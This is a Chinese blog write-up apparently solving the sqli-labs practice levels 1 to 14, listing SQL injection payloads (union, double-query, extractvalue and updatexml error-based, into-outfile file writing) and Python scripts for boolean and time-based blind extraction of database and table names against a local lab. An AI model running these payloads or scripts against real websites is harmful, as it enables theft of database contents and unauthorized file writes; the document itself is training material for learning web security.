sqli-lab 解题(1-22)

Less-1 GET - Error based - Single quotes - String

(基于错误的GET单引号字符型注入)


根据报错信息,推断为字符型注入




order by 3回显正常 order by 4报错 推断出column数为3



用group_concat可以把这个字段的值打印在一行

Less-2 GET - Error based - Intiger based

(基于错误的GET整型注入)


其中%2b为+的url编码



看到输入1+1的返回结果与输入2相同
判断为数字型注入
payload与Less-1相似 只需把引号去掉即可

Less-3 GET - Error based - Single quotes with twist string

(基于错误的GET单引号变形字符型注入)


输入1'报错 报错信息提示内容放到单引号加圆括号里
推测语句为select ... from ... where id=('1')
payload与Less-1相似 只需添加一个圆括号即可

Less-4 GET - Error based - Double Quotes - String

(基于错误的GET双引号字符型注入)


输入单引号不变 输入双引号报错
根据报错信息推测语句为select ... from ... where id=("")
把Less-1后面的单引号换成双引号加)即可

Less-5 GET - Double Injection - Single Quotes - String

(双注入GET单引号字符型注入)

输入1'报错



但是页面显示的结果一直为You are in...



可以采用布尔盲注 时间盲注 报错注入
这里采用布尔盲注爆破数据库为例

爆数据库长度

def getdb_num():
    for i in range(1,20):
        payload=f"' and length(database())={i} --+"
        html=requests.get(url+payload).text
        if('You are in' in html):
            print(f"[+]数据库长度:{i}")

爆破数据库名

def getdb_name():
    db_name=''
    for i in range(1,db_num+1):
        max=ord('z')
        min=ord('A')
        while abs(max-min)>1:
            mid=(max+min)//2
            payload=f"' and ascii(substr(database(),{i},1))>{mid} --+"
            html=requests.get(url+payload).text
            if('You are in' in html):
                min=mid
            else:
                max=mid
        db_name+=chr(max)
    print(f"[+]数据库名:{db_name}")
    return db_name

总代码

import requests
def getdb_num():
    for i in range(1,20):
        payload=f"' and length(database())={i} --+"
        html=requests.get(url+payload).text
        if('You are in' in html):
            print(f"[+]数据库长度:{i}")
            return i
def getdb_name():
    db_name=''
    for i in range(1,db_num+1):
        max=ord('z')
        min=ord('A')
        while abs(max-min)>1:
            mid=(max+min)//2
            payload=f"' and ascii(substr(database(),{i},1))>{mid} --+"
            html=requests.get(url+payload).text
            if('You are in' in html):
                min=mid
            else:
                max=mid
        db_name+=chr(max)
    print(f"[+]数据库名:{db_name}")
    return db_name
if(__name__=="__main__"):
    url='http://127.0.0.1/Less-5/?id=1'
    db_num=getdb_num()
    db_name=getdb_name()


通过看别人的博客学到了还可以用双查询注入
双查询注入

hid=-1' union select count(*),1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e,floor(rand(0)*2)) as a from information_schema.tables  group by a --+

Less-6 GET - Double Injection - Double Quotes - String

(双注入GET双引号字符型注入)

将上一题的单引号换成双引号即可

Less-7 GET - Dump into outfile - String

(导出文件GET字符型注入)


经过尝试发现原语句应为select * from users where id=(('id'))
因此采用'))来闭合
题目提示dump into outfile
这里采用写入文件的方式


id=1')) union select 1,2,'helloword' into outfile "D:\\phpstudy_pro\\WWW\\test.txt" --+

Less-8 GET - Blind - Boolian Based - Single Quotes

(布尔型单引号GET盲注)

使用布尔盲注和时间盲注均可 与第五题思路类似
唯一不同点是不能用报错注入


Less-9 GET - Blind - Time based. - Single Quotes

(基于时间的GET单引号盲注)

不管输入什么
以下为爆出数据库名的python脚本

import requests
import time
url='http://127.0.0.1/Less-9/?id=1'
database=''
for i in range(1,9):
    max=ord('z')
    min=ord('a')
    while abs(max-min)>1:
        mid=(max+min)//2
        payload=f"' and if(ascii(substr(database(),{i},1))>{mid},sleep(2),1) --+"
        stime=time.time()
        requests.get(url+payload)
        etime=time.time()
        if etime-stime>1:
            min=mid
        else:
            max=mid
    database+=chr(max)
    print(database)

Less-11 POST - Error Based - Single quotes- String

(基于错误的POST型单引号字符型注入)

简单的post注入



Less-12 POST - Error Based - Double quotes- String-with twist

(基于错误的双引号POST型字符型变形的注入)

输入admin"时出现报错信息


可见查询语句应该为SELECT username, password FROM users WHERE username=(uname) and password=(passwd) LIMIT 0,1
与上题思路一样 把单引号换成")即可

Less-13 POST - Double Injection - Single quotes- String -twist

(POST单引号变形双注入)

输入username输入admin'报错



可知需使用')闭合



输入内容无回显,想到采用布尔盲注
发现当登录成功时会出现flag.jpg

以下为爆出数据库名的脚本

import requests
url='http://127.0.0.1/Less-13/'
database=''
for i in range(1,9):
    max=ord('z')
    min=ord('A')
    while abs(max-min)>1:
        mid=(max+min)//2
        payload=f"admin ') and ascii(substr(database(),{i},1))>{mid} #"
        data={
            'uname':payload,
            'passwd':"123"
        }
        html=requests.post(url=url,data=data).text
        if("flag.jpg" in html):
            min=mid
        else:
            max=mid
    database+=chr(max)
    print(database)

爆出第三张表(users表):

import requests
url='http://127.0.0.1/Less-13/'
table=''
for i in range(1,6):
    max=ord('z')
    min=ord('A')
    while abs(max-min)>1:
        mid=(max+min)//2
        payload=f"admin ') and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),{i},1))>{mid} #"
        data={
            'uname':payload,
            'passwd':"123"
        }
        html=requests.post(url=url,data=data).text
        if("flag.jpg" in html):
            min=mid
        else:
            max=mid
    table+=chr(max)
    print(table)

Less-14 POST - Double Injection - Single quotes- String -twist

(POST单引号变形双注入)


输入admin"报错



可知使用"闭合
思路和上题一样 可以采用布尔盲注 也可以采用报错注入
这里采用报错注入
1.concat聚合函数报错注入
payload:

uname=123" union select count(*),concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema =database()),0x7e,floor(rand(0)*2)) as a from information_schema.tables group by a#&passwd=123

2.extractvalue报错注入
payload:

uname=123" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) #&passwd=123

3.updatexml报错注入
payload:

uname=123" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #&passwd=123
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,172评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,346评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 159,788评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,299评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,409评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,467评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,476评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,262评论 0 269
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,699评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,994评论 2 328
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,167评论 1 343
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,827评论 4 337
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,499评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,149评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,387评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,028评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,055评论 2 352

推荐阅读更多精彩内容